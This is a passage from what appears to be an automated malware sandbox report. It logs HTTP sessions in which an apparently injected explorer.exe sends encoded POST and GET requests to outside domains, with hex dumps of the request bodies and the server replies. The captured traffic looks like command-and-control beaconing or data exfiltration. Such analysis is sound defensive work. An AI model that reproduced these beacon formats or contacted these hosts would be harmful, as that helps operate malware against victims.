                                                          Data Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 77 66 55 49 54 4a 72 38 6e 42 69 33 43 30 6e 79 34 56 51 4b 34 4c 42 78 4e 30 64 31 37 31 6e 5a 62 68 73 33 6f 37 6d 43 49 62 66 65 4d 59 39 2d 75 44 4f 5f 5a 47 52 6f 66 4d 30 48 44 2d 4b 44 7e 63 7e 59 4b 7a 7e 57 33 55 31 6d 67 79 68 45 7a 57 75 42 72 6d 4b 6f 34 63 47 5f 30 46 78 56 61 6f 28 77 4f 52 4e 56 51 56 62 66 74 6f 63 64 61 69 34 68 54 4b 6c 54 63 54 47 34 42 37 54 4b 43 79 52 45 73 4a 55 64 72 71 64 53 7a 4d 7a 44 4e 43 38 58 68 33 75 6a 62 50 35 42 64 75 36 36 30 33 42 67 34 6a 28 41 6f 64 58 78 44 49 5a 6e 47 62 6d 4c 6b 37 32 44 7a 49 49 6d 4d 36 41 65 74 70 6e 75 79 4c 54 79 46 50 73 39 63 36 4f 47 4c 56 34 61 31 39 43 31 5a 43 72 69 6e 31 78 61 62 42 67 6a 79 45 79 47 75 44 74 75 4f 53 36 66 4e 47 51 39 65 76 4d 49 49 49 35 67 64 54 61 43 38 62 35 31 70 77 67 2d 4d 74 48 71 62 62 6b 36 6c 6c 75 63 31 32 4f 4d 34 49 31 4b 76 48 57 2d 77 4c 63 31 57 57 38 46 78 38 6e 54 51 31 68 6e 28 46 47 41 39 67 79 45 46 69 67 4e 42 5f 39 31 62 62 35 47 64 7a 66 36 70 42 46 68 59 37 6c 50 6d 33 61 64 54 50 48 69 31 64 6a 33 57 6e 48 71 36 44 76 68 66 30 58 34 76 57 64 30 76 6a 30 71 69 44 73 51 54 37 62 2d 6a 57 34 5a 7e 45 43 2d 30 56 73 45 55 6c 36 43 4a 6e 33 6c 68 70 54 6f 78 59 4b 6d 55 52 39 45 58 4e 34 4f 63 51 51 56 7a 55 7e 41 61 66 43 57 4d 68 66 62 7a 4c 6c 7a 32 47 51 43 6b 63 4f 34 4e 77 5a 42 4e 52 31 5f 75 45 4a 35 79 62 36 56 41 39 47 57 4a 54 52 4a 73 59 61 38 74 36 37 35 67 51 45 61 79 59 69 35 73 6b 31 79 5a 41 31 7a 67 54 74 71 58 74 6c 68 59 53 79 7a 57 54 36 76 53 47 64 46 56 4d 66 4b 55 4d 6a 47 65 75 47 44 6a 76 6f 37 54 35 78 6a 57 6b 62 59 44 75 52 75 50 31 39 43 67 62 4c 48 45 52 31 44 75 69 28 7a 28 44 48 6f 77 4b 6e 35 28 46 30 59 64 6b 34 56 31 68 5a 52 6b 69 56 52 4b 45 4b 30 49 75 71 5a 48 53 62 68 4e 38 4b 41 45 59 6e 55 62 44 6a 41 4f 38 4d 67 32 58 5a 35 6a 77 61 57 52 38 4f 64 58 65 57 4e 48 55 36 71 7e 4f 76 6c 50 55 51 42 43 77 78 34 4c 4a 6a 4c 4b 31 48 43 6f 35 42 52 42 78 76 77 50 47 77 70 4a 65 43 49 71 45 33 74 71 4a 4b 62 44 44 43 6e 57 49 66 45 42 38 58 35 48 70 65 63 67 72 4c 75 4c 30 54 4f 37 4a 44 43 32 6d 31 69 51 4d 6a 7a 4a 73 45 77 71 4c 46 70 68 74 5a 41 59 2d 53 6d 52 2d 7a 54 58 32 6c 70 45 5a 68 58 45 43 69 4a 4b 45 44 57 62 4d 5a 33 41 50 4c 41 7e 61 33 74 37 70 5a 44 6e 69 51 4a 66 46 57 33 6a 57 59 33 45 77 31 34 75 70 45 51 66 32 4d 5a 71 71 73 2d 47 36 57 43 6e 32 65 6a 36 37 37 2d 55 70 50 63 49 74 63 79 62 32 38 47 5a 63 70 44 4d 6b 69 35 56 53 36 34 70 5f 32 47 44 69 4a 39 79 66 70 74 63 6c 7e 6e 7a 44 55 6a 73 6b 44 41 52 4e 57 49 51 64 4e 51 7a 72 45 5a 74 6f 4e 5f 6b 63 77 54 50 72 6d 76 41 77 43 55 4f 30 55 6e 77 34 59 73 73 4c 33 46 49 64 49 4f 43 33 48 4f 59 73 30 65 53 33 71 76 4f 78 64 36 76 34 4c 6d 6d 36 53 55 48 57 78 52 46 73 32 35 34 62 36 53 66 75 33 58 4a 42 7e 44 33 56 30 74 47 4d 4f 36 4a 58 28 32 51 38 58 6e 44 42 59 49 34 6c 76 66 7a 38 38 6b 77 6a 6f 4f 51 55 7e 65 73 4a 6c 74 6c 4b 5a 44 5a 78 6b 57 45 71 6f 77 48 66 64 58 73 4a 42 76 52 57 45 7a 39 57 30 5a 50 4e 6b 61 63 72 6b 62 64 34 53 67 38 73 4a 67 4a 6e 70 32 31 45 53 4f 4f 32 6f 46 4d 34 45 39 6a 5a 66 39 44 51 30 55 79 4d 58 35 36 55 70 68 33 6c 72 6a 64 39 69 7a 70 6c 6e 76 35 38 4e 52 28 67 65 78 31 34 77 66 47 46 32 6d 65 52 57 67 41 47 6b 6f 55 39 72 7a 74 58 64 7a 54 77 4c 79 78 34 36 74 4c 63 42 63 33 42 66 71 4d 61 73 41 49 48 70 6d 54 30 6f 75 69 58 5a 31 57 78 59 31 7e 48 4c 47 47 5f 59 41 76 42 39 54 32 53 54 7a 71 67 6c 66 49 68 39 79 43 32 41 30 39 31 6d 4a 34 66 7a 56 35 6c 7e 46 7e 71 4c 6a 6d 57 6c 50 57 6a 30 30 7e 47 49 4b 52 69 74 68 41 4d 42 37 48 37 62 68 59 4e 7a 58 66 68 5a 6d 7e 6a 6d 59 7a 6d 41 37 78 45 50 7a 47 50 77 6a 46 61 33 79 4f 6d 73 2d 7e 67 6a 43 4a 48 36 62 7a 6d 5a 5f 68 54 77 6b 37 76 59 75 73 59 66 5a 32 57 6f 6c 67 4e 31 64 6c 63 54 59 56 62 7e 72 4e 66 45 62 42 58 74 62 37 62 6d 36 53 46 6b 46 47 37 58 52 66 67 53 47 57 53 51 4f 67 61 39 58 4e 63 36 62 68 33 68 79 4b 30 28 6e 59 73 44 6e 58 53 6d 55 7e 75 50 46 36 6e 69 62 63 46 4b 38 66 54 61 6c 6a 67 6b 74 4a 37 53 34
                                                          Data Ascii: bcX3Uv=fpdggjRt1rKnwfUITJr8nBi3C0ny4VQK4LBxN0d171nZbhs3o7mCIbfeMY9-uDO_ZGRofM0HD-KD~c~YKz~W3U1mgyhEzWuBrmKo4cG_0FxVao(wORNVQVbftocdai4hTKlTcTG4B7TKCyREsJUdrqdSzMzDNC8Xh3ujbP5Bdu6603Bg4j(AodXxDIZnGbmLk72DzIImM6AetpnuyLTyFPs9c6OGLV4a19C1ZCrin1xabBgjyEyGuDtuOS6fNGQ9evMIII5gdTaC8b51pwg-MtHqbbk6lluc12OM4I1KvHW-wLc1WW8Fx8nTQ1hn(FGA9gyEFigNB_91bb5Gdzf6pBFhY7lPm3adTPHi1dj3WnHq6Dvhf0X4vWd0vj0qiDsQT7b-jW4Z~EC-0VsEUl6CJn3lhpToxYKmUR9EXN4OcQQVzU~AafCWMhfbzLlz2GQCkcO4NwZBNR1_uEJ5yb6VA9GWJTRJsYa8t675gQEayYi5sk1yZA1zgTtqXtlhYSyzWT6vSGdFVMfKUMjGeuGDjvo7T5xjWkbYDuRuP19CgbLHER1Dui(z(DHowKn5(F0Ydk4V1hZRkiVRKEK0IuqZHSbhN8KAEYnUbDjAO8Mg2XZ5jwaWR8OdXeWNHU6q~OvlPUQBCwx4LJjLK1HCo5BRBxvwPGwpJeCIqE3tqJKbDDCnWIfEB8X5HpecgrLuL0TO7JDC2m1iQMjzJsEwqLFphtZAY-SmR-zTX2lpEZhXECiJKEDWbMZ3APLA~a3t7pZDniQJfFW3jWY3Ew14upEQf2MZqqs-G6WCn2ej677-UpPcItcyb28GZcpDMki5VS64p_2GDiJ9yfptcl~nzDUjskDARNWIQdNQzrEZtoN_kcwTPrmvAwCUO0Unw4YssL3FIdIOC3HOYs0eS3qvOxd6v4Lmm6SUHWxRFs254b6Sfu3XJB~D3V0tGMO6JX(2Q8XnDBYI4lvfz88kwjoOQU~esJltlKZDZxkWEqowHfdXsJBvRWEz9W0ZPNkacrkbd4Sg8sJgJnp21ESOO2oFM4E9jZf9DQ0UyMX56Uph3lrjd9izplnv58NR(gex14wfGF2meRWgAGkoU9rztXdzTwLyx46tLcBc3BfqMasAIHpmT0ouiXZ1WxY1~HLGG_YAvB9T2STzqglfIh9yC2A091mJ4fzV5l~F~qLjmWlPWj00~GIKRithAMB7H7bhYNzXfhZm~jmYzmA7xEPzGPwjFa3yOms-~gjCJH6bzmZ_hTwk7vYusYfZ2WolgN1dlcTYVb~rNfEbBXtb7bm6SFkFG7XRfgSGWSQOga9XNc6bh3hyK0(nYsDnXSmU~uPF6nibcFK8fTaljgktJ7S4T_2F2CNjfG35suTlse~ioLdvDW2BXbSiDE8k1dMdptW31AczL5fU(tLrasKnwqb_as2Zy8RLdW6L9yDXphOux4E6IncIh7m1rX1DQg2_wa(r5HRP1gMLYpMCjOKVcZZYRC07rJzKZTZ0xLTb3GbzaW6FxzZzbfpQZPujwEaWTvpSfi6ftA5Ib_mDxyR3imqRg6IRA1nAt60h9BGDzB0bXlTsXl3vhKC4PHGU24LyKCUIVcOy(ZFaD-56Qb5AWgIHxMu_KzswjdBc9pW0c0s6SUW-SfdzksKmCyq9sS1FlPGL(8KteCeA8FDBln0zmwJfg_TLgmH6GVWWXKNx5UbUMgZdNweqUvbDnrSMpdZ33kctydk2yIATE73yzbyp5ATx4IUUd_p6o4JEKNudt_Et67H9St9Zd39bCsuoxnk2wN(i~lJDAwbetcD4kzw_e0y6gHuwxw2HVp(0prNr3VXJFkZO(zE4bkM5K3oBDgciz7gOM6TI2pvuq5Tt3VKTqLdrdhAvkjqJjIcFKHzLCxXxon87KDMmRZ0xCOCw0Jc7RTeOU8EyW5FsPniI(p3AW0R5Scckiip1dtmdTnVVY9GgFsZIzukoHWzXBjktsVvpMTEsQdfBRSo4U8i2SK(QkPY8Wka9s8l8vqOWFeL9fNQAflURq2G2nk~gxH9XVneBDPMwjftDiNYp4ffWObJt3fSaKu9IfUja6IlUdXyWicthhMxdavuTx94LCyj3cXnnhY64g4VbrXERgwu1hixLvEjscIf6BzFjKStJGOx9mwcdNohoBf8ViDMp2LItj9Wj6ErGotZO2T1XBlN-f4K_UQwnS-cCwe2W2S~Bh2ijzTr97kGzSE6uRe0mTdll(EQvuKGRFqTIACmUXBhjff043sKvTmoZxLFhjRN5tutVCIJPwcvjwyle1xdlnQAIjToCe2KamH~Tt9jSHfQtz0BXlTp8BPPYzXuvinpMbpJzNED0zHkDJlqbUcMcb54W6KGDXpmvxdL8zfuc4SPcx7w2cvbHsuqEOJbVBVWZNoCN8eyACoCxoJ9lFKmHIEFSoZRt1mzK1lQ9bdVpr-AbibyjOu9Nm21oZc(dt403Z9YUsLBahRhkg16inLsPKgeZkmru(hGGMECYnY073nj2hWa4rtS4~MSqSWgmrr1YQ1QrzhQ9jpiAa7ejFERXoGH5tYYP39OTC7QQo6QPLFAJNb~7~U5iRj2Rwc1uQLyNMVPfRbNra9RlbJKHgTE4Ss~mmcLU5x8CKewYBlqGnxMf8lNCI6KLMQGJ6WLxSd8Eqm4rQ1l8RQSeKicjKLMxHYM8gqLepS92zOUl18fbtV2rcPI0RVAaPbDXSv3tmrTIX8w1VTNzQyx9wmtWfDgPithu61c6iBWNTLVsp-udPK5GX_C7ut0ik9eqnU1OhF6w3ehUzGCvKW4wk3H3WSpzPWXQ3uTp~GNj7OfAXPaeakond80PK8t3xtz57V0yvUNpqwDky1k1vMOJoyJ21GJ_m7W9vdZIIeWV7KD92FxseMNqCMzMHutfM2zTKiq-prNBTn8E8QFIey9QMJ3_q4KD(FUI7d0-KNkKrteQBClnkDsg(MKOSJ0nWg6eO8qvNU0_k7MS5pGtGLcTf-ePF7OP0TnF77Eo7RYmPQmBhc0oY410VQMx(TGBsx5Npc0dVnqCM1GAWzfcLfvBj0VRqSdEOWAs3Xkv2Ao31nmuoSAeh-AXm_N_eIbiIvrbkVk10sd0getIvSqhHmKx2JVZXAeWfNKO6wr-bYzqt-QNKTs6c1ntAW6wPdmJqlzTaqLyXo3qcmM-K68IjNrlCCKjBozwBGcrtYrXgu3iXhgOm6sJk2cJisTtDgU4BzVvoEwhPQpEh4KmV9H_kbnRYNRDqqSqjJ1volbo~0oEzfSGXKYgDAGVB1h8OGT45VxiNY5e5UA61IUiITq7Hor9x9WqNb8dvyUbjEzGY3T5fY2DduQZ7hdewlzPLvkwR-eOB7~A9DRvKPq3qOoloJfeWts0tR3vp4(RT7(b7XHKTRYzYSbHwIcUg3SZqi0FcN9bUN8sC-KDTeMiO1kMX9IoNTS1mt9RD3vxzFzvEjj8S9FHrB6LL3zMYmBFixML1C1FldonN19_9TetSFCNyNL7Q4aXHo(BiCZw3pxXQkALgXyIPRx_fv9XvaXOCEsCNsNAH9I88C(WxC~_nRxp4jqUGaJrdNPPHdCaV64snYbPCowQuUwvoUQ0mLTxCBDJHNDaqEBASCdrrx~tOFPA1Qs9A2xl0b8ag2FeKySq7BbeeVCZN4sBoyZNoEPpCa7fz7qQsV6wM8oe9ZGLnnRjjr7eBGOffmb4CrkgItWlUWULcPUVthBTHOZzg81cdgvgZr66bjLM9H~V271PulrH1qjhU_iwrPQ8vGic~G7DLVfgrFfFvtR43eBUArYJK8FCLo4NcD4X5ozE8hby8HAyBCZQTJZ_TGt6cV197Mlu7kIzBACAZ3HR2bxXX4B4kNuwWr5mZTRjvFYiv3OfwOr1WNCwQVj4EEX259ifpcGzeJZeXHARzmXpDktVwKNS0ch7xoG3UrLrKQH_g8cNgECUMo~0AP(-X50he-cdS5t2vzb2ugzFybdogueTEwZj2wxZECEy(C9n~bm6RjGtWwMpd2iI4bni7q6tsZlLUTLri4WVwRXjd1eiI3Ua~aP-oOWVH75jTaYzVdGyWheZgwynSUlfKxYHrqr45q3
                                                          Mar 21, 2023 08:08:38.834908009 CET518INHTTP/1.1 404 Not Found
                                                          Connection: close
                                                          x-litespeed-tag: 735_HTTP.404
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"
                                                          x-litespeed-cache-control: no-cache
                                                          transfer-encoding: chunked
                                                          content-encoding: gzip
                                                          vary: Accept-Encoding
                                                          date: Tue, 21 Mar 2023 07:08:38 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 35 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 7f 77 db 36 b2 e8 df f2 39 fd 0e 08 fd 36 b6 12 92 22 a9 1f 96 65 cb bd 6d da ee f6 bc 76 d3 d3 b4 77 df de 24 cf 07 22 21 89 09 45 f2 92 94 65 d7 f5 77 7f 67 06 00 09 52 94 44 c9 4e 6f f7 6d f6 de cd 5a 20 30 33 18 0c 66 06 83 01 70 f9 ec 9b d7 af 7e f9 e7 4f df 92 79 b6 08 ae be 38 ba 84 ff 25 9e 9f 8c b5 20 4b 34 12 d0 70 36 d6 58 68 fc fa 46 3b 6a c5 09 9b fa b7 63 2d 9a 8d c8 3c cb e2 74 d4 e9 44 b3 d8 5c b0 4e 98 1e 6b 04 01 30 ea c1 ff 2e 58 46 89 3b a7 49 ca b2 b1 f6 eb 2f df 19 43 2d 2f 0f e9 82 8d b5 1b 9f ad e2 28 c9 34 e2 46 61 c6 c2 6c ac ad 7c 2f 9b 8f 3d 76 e3 bb cc c0 1f 3a f1 43 3f f3 69 60 a4 2e 0d d8 d8 46 28 81 1f 7e 24 09 0b c6 5a 9c 44 53 3f 60 1a 99 27 6c 3a d6 24 59 b3 45 3c 33 a3 64 d6 b9 9d 86 1d 1b 1b 7d 71 74 99 f9 59 c0 ae 7e a2 33 46 c2 28 23 d3 68 19 7a e4 f9 f1 d0 b1 ed 0b f2 b3 3f 0d 18 f9 39 8a a6 2c 49 2f 3b bc ee d1 51 ab 75 f9 cc 30 c8 57 41 40 fc 90 bc 0e 19 79 f3 ed 6b d2 33 1d f3 9c 18 84 fa 51 ca 22 d3 8d 16 c4 30 ae a0 32 76 9c 77 30 89 26 51 96 2a dd 0b 23 3f f4 d8 ad 46 3a d5 aa 33 16 b2 84 66 51 a2 d4 ae a0 3c fd ea fb d7 6f be 7d dd 16 b8 25 90 d4 4d fc 38 23 d9 5d cc c6 1a 8d e3 c0 77 69 e6 47 61 27 f0 5e 7e 48 a3 50 23 6e 40 d3 74 ac 71 52 8d d4 9d b3 05 d5 80 80 d6 bd f6 1f c8 fa db 4c 1b 09 d6 bd eb bc eb f0 2a c0 3e 4d d7 fe 63 96 d0 78 ae 8d de de 6b ff 01 48 b4 91 f6 75 c2 a8 e7 26 cb c5 e4 07 3f cd a0 8e ef 95 00 24 c0 ca 84 73 12 78 f3 ae 33 8f 27 67 ef 3a c7 93 bc 65 c0 5b fa 19 5b 00 90 6f 03 b6 60 61 56 42 03 e5 df 67 6c d1 08 c1 31 00 14 b5 e3 28 f5 81 05 da c8 d6 35 c0 a0 8d 0a e2 ff c1 26 20 00 8d 80 6a ba 06 23 a9 8d b4 bf 45 0b 68 e2 31 ce 6e 04 ae fd 10 45 1f fd 70 46 a6 51 42 28 09 d9 8a 40 9f 75 fc 97 24 2c a6 7e a2 13 fc 06 e5 24 61 8b c8 63 c1 97 e4 1f ec e4 86 91 59 94 91 bb 68 49 dc e8 86 25 cc 33 c9 ab 68 b1 60 89 eb d3 00 1a 25 2c f5 3d 16 82 e8 93 94 25 30 23 4c f2 4b 14 93 ff 5e d2 c0 cf ee 10 0b 60 a7 19 a1 21 a1 d3 69 94 78 74 12 30 12 27 be cb 9e 69 ba b6 4c 82 1d c3 a2 3d e8 5a c8 6e 39 e3 54 11 d8 38 82 39 9b 1f f4 82 a7 7b 8d 94 10 85 1c 90 ae 15 e3 e5 3c 6e bc 38 e8 62 d4 fe 1e 65 e4 3b 98 e4 8d 98 21 5a 3f e8 5a 9c b0 1b 3f 5a a6 28 4f db d9 52 c8 dd c3 7b 95 25 af 93 19 0d fd df 70 2a 36 92 b5 e3 a8 dc 42 08 5e 49 2b 35 ea 86 a6 6b 41 34 8b 54 99 ff 7e 41 67 ec f5 e4 03 73 61 b6 ee 16 8b 55 6c 08 95 fc ae b3 8c 83 88 7a e9 bb 8e 63 39 dd 77 1d cb 7e d7 01 f0 46 18 19 13 ea 7e 9c 25 c0 5f 33 0e 51 57 ec d4 03 a5 5e fe 00 64 ea 5c e9 6b 23 db
                                                          Data Ascii: 5253}w696"emvw$"!EewgRDNomZ 03fp~Oy8% K4p6XhF;jc-<tD\Nk0.XF;I/C-/(4Fal|/=v:C?i`.F(~$ZDS?`'l:$YE<3d}qtY~3F(#hz?9,I/;Qu0WA@yk3Q"02vw0&Q*#?F:3fQ<o}%M8#]wiGa'^~HP#n@tqRL*>McxkHu&?$sx3'g:e[[o`aVBgl1(5& j#Eh1nEpFQB(@u$,~$acYhI%3h`%,=%0#LK^`!ixt0'iL=Zn9T89{<n8be;!Z?Z?Z(OR{%p*6B^I+5kA4T~AgsaUlzc9w~F~%_3QW^d\k#
                                                          Mar 21, 2023 08:08:38.835011959 CET520INData Raw: b2 2c 5d 9b 33 7f 36 cf b4 51 f7 ac fb a0 6b 3e 10 8e 3d 39 00 f2 83 3a 1e fb 4c 7b 21 a1 2b 36 89 b9 a6 d8 cd b1 5c f2 fc f0 07 1a ce 96 48 b6 30 9c ba e6 a7 3f d1 24 7b 3d 6d d8 93 15 9b a4 7e c6 60 72 16 0a b3 59 5b 41 7a d1 0c f5 6c 95 13 6f
                                                          Data Ascii: ,]36Qk>=9:L{!+6\H0?${=m~`rY[Azloz},Ii"5mYm JFUixZ-#$9Kq$mvGqw3N:<^h$jLs/oFk%~etAc5U)c^}E(fT`,
                                                          Mar 21, 2023 08:08:38.835052013 CET521INData Raw: 0a 13 1c 16 32 26 a5 be 5e c8 81 6c b5 4e 73 63 a8 28 b6 ce 8b dc 7f cd 39 9b 0a 9f 14 3d 51 2a dd e4 8e c7 6e 66 4b df 63 69 c7 8d 82 80 a1 43 d5 c9 3f 7f 48 3b d2 37 40 97 6b 46 09 0d 3d 20 86 4a ad ed c2 e2 2a f3 27 3e c6 8f d2 b9 bf c8 dd 09
                                                          Data Ascii: 2&^lNsc(9=Q*nfKciC?H;7@kF= J*'><QOT94gf@Jb2896g,-J;iA*I]L4mUeivz6$9bV[Jm691<VnJFIKT
                                                          Mar 21, 2023 08:08:38.835092068 CET522INData Raw: 67 3d f9 26 df 08 6f eb b1 39 f5 83 e0 17 76 9b 9d 52 b1 1e cc e6 7e aa b3 b6 6e e9 56 5b f7 cd 2c 82 e8 e2 af 3f ff 00 21 1c a1 ca 0e 87 9b 09 b8 6c 3c 1e 97 60 3f e4 1d 73 4f 19 e7 57 b6 ce 29 2e aa 5a fb 22 33 61 8f 8d e9 99 e9 41 e4 64 9c 99
                                                          Data Ascii: g=&o9vR~nV[,?!l<`?sOW).Z"3aAd,kzCEMC~3PvQOkCYwQrq}Megf!,es?Yz[w=[e$mXv:OOai+?s],Chk0z$,t
                                                          Mar 21, 2023 08:08:38.835135937 CET524INData Raw: 81 d3 07 ae 48 f5 0c 1a f8 e2 01 3c 6a 96 10 53 8c 2d a6 f1 62 9e a3 bf 98 dd 2f e8 2d 3f 71 31 72 fa 56 7c 7b f1 00 62 90 50 03 6b a5 37 b3 7b ae 7c e5 47 a4 58 02 c4 1f 4a 92 a7 42 99 dd 2f 8d 95 65 9e 77 cf 6a 48 13 cc 47 16 28 ad 37 f5 ab 76
                                                          Data Ascii: H<jS-b/-?q1rV|{bPk7{|GXJB/ewjHG(7vv=A1Q,(!Wol(`7ush\#y*^`3qPULu-365\3vE6rt4?c]u#eP]j ZzD2IXp.F@
                                                          Mar 21, 2023 08:08:38.835176945 CET525INData Raw: dd 2c 89 56 23 3b f7 8d 2a 2d bb 26 c6 92 8e 0b af 36 f0 2b 4b 8a 6a 85 62 c2 c1 39 fd 98 cc 9d 0a 4c cb 3c 03 9d ae c0 9c 3b 8a 33 66 9b 67 10 80 c1 58 a0 91 32 38 fb 92 71 cb 8d db 02 04 3d 0b 0a db 2b 01 43 6b 25 6c d4 8e 9a 7c f4 b6 d7 95 7e
                                                          Data Ascii: ,V#;*-&6+Kjb9L<;3fgX28q=+Ck%l|~`'oz,l4BOlSllj2m'=a%"l tn58L?BQ{9PU4U7ra_5dD`\~UP?;d#g(!n @=JGA
                                                          Mar 21, 2023 08:08:38.835215092 CET526INData Raw: 95 fe 24 ee 8b ec 85 81 2e a7 ea 69 09 97 73 1f 87 ac 6e 8d cf e3 67 bb 3c b5 4f dc 2f b5 13 fb bb d2 38 8a a5 cd 68 23 cd e0 fa 1a 13 e2 9f 62 7f da 98 d0 84 4f d5 aa 10 e4 b1 29 11 cb 16 21 4b 84 0a 8b 61 96 18 70 9f ef 47 23 8e fc 30 53 8b 85
                                                          Data Ascii: $.isng<O/8h#bO)!KapG#0STN'T2K];$l|ic{W!Q%>Hz;m![v'Ii4/avrC#.v\JDeo'_2:TsAZ
                                                          Mar 21, 2023 08:08:38.835254908 CET527INData Raw: dc 88 01 e4 85 7c cb b7 4d 70 5f 99 88 6d 11 a1 bd 0a f9 ca 01 62 35 be 15 9d 0f 35 cf 3b e0 87 d5 62 0a b7 20 d4 d2 52 6a 2a 8e 7d 8d 08 5c 24 48 bc 28 cb 98 57 9d 1e 8a a6 c4 b3 6e 98 4a 59 5b 78 7d 2d a7 84 f4 9c f1 d2 2a 62 91 e1 5f 1a 41 45
                                                          Data Ascii: |Mp_mb55;b Rj*}\$H(WnJY[x}-*b_AEH'@6\6G->Lb(xD{V:aBouuRv8rO7;r-iC 7_%x$P*+pMJ LEOE,zMw(kN
                                                          Mar 21, 2023 08:08:38.835294962 CET529INData Raw: f8 3b fc 4f 5d cb c1 e8 98 39 6c 38 b5 ea 3e 9e 8d 8e dd 89 d7 67 76 dd c7 e1 e8 f8 bc 47 bb 93 a1 34 27 82 19 ea 8e 20 d9 b8 a5 08 6a 00 97 a4 70 ae d1 73 93 e5 62 92 12 33 4b a8 1f 18 93 24 5a a5 22 15 b3 e6 33 9e 9b e1 21 ba 4d 5f 49 e0 e7 29
                                                          Data Ascii: ;O]9l8>gvG4' jpsb3K$Z"3!M_I)'#|I:dHd1+z,.X4+d{~0Mo_Y}NbN`~r/E"L8Yd]T45I ;W}7#8K..
                                                          Mar 21, 2023 08:08:38.835335016 CET530INData Raw: 53 05 b4 09 80 78 01 1c 60 44 89 0f 7b 5a f2 cc e3 85 c4 0d df 8a 07 fc c4 05 6d f2 23 22 2a be 72 b9 ba c8 e9 5a 83 29 09 2e 9a 48 80 92 ea e2 8b 00 56 8f a2 66 f8 aa 21 33 e4 3e 3e ab 5b 37 9a 1b 6b cb 40 12 a6 ac ca 7e 02 13 4a ca 5e 7e 50 bd
                                                          Data Ascii: Sx`D{Zm#"*rZ).HVf!3>>[7k@~J^~PJoGyy(Q_%lNL_$vHz3d@E=/3<SRA^Es8w(^0NC|4W+)]}dkX3;E2Y.pR


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          15192.168.2.34971367.222.24.4880C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:41.218318939 CET531OUTGET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1
                                                          Host: www.rifleroofers.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:08:41.410840988 CET532INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          content-type: text/html; charset=UTF-8
                                                          x-redirect-by: WordPress
                                                          location: http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X
                                                          x-litespeed-cache: miss
                                                          content-length: 0
                                                          date: Tue, 21 Mar 2023 07:08:41 GMT
                                                          server: LiteSpeed


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          16192.168.2.34971449.212.180.9580C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Mar 21, 2023 08:08:49.243649960 CET533OUTPOST /hpb7/ HTTP/1.1
                                                          Host: www.denko-kosan.com
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.denko-kosan.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.denko-kosan.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 28 6d 4b 38 51 6b 52 4c 77 5f 6d 75 78 44 30 48 70 49 69 73 48 30 72 70 72 66 41 54 6b 6d 6c 6e 42 4b 68 67 79 37 65 6e 75 78 58 59 79 35 45 30 45 70 7e 58 51 6d 72 72 5a 4d 55 6e 75 76 37 33 51 69 6b 57 37 36 4c 46 59 74 71 34 32 6e 59 43 63 70 69 6c 54 39 6d 62 4e 32 54 39 4e 65 66 32 7a 68 6d 72 36 7a 4d 33 68 53 34 62 58 4c 76 6b 71 39 6d 6a 6a 67 54 33 70 45 47 69 44 34 6b 2d 51 2d 53 77 76 78 73 78 28 71 63 36 6d 42 42 61 36 51 6a 46 62 4d 68 54 47 69 4b 4e 51 5a 47 2d 5a 50 31 53 39 67 29 2e 00 00 00 00 00 00 00 00
                                                          Data Ascii: bcX3Uv=AsvgeLDfpdKZ(mK8QkRLw_muxD0HpIisH0rprfATkmlnBKhgy7enuxXYy5E0Ep~XQmrrZMUnuv73QikW76LFYtq42nYCcpilT9mbN2T9Nef2zhmr6zM3hS4bXLvkq9mjjgT3pEGiD4k-Q-Swvxsx(qc6mBBa6QjFbMhTGiKNQZG-ZP1S9g).
                                                          Mar 21, 2023 08:08:49.543113947 CET533INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:08:49 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 196
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
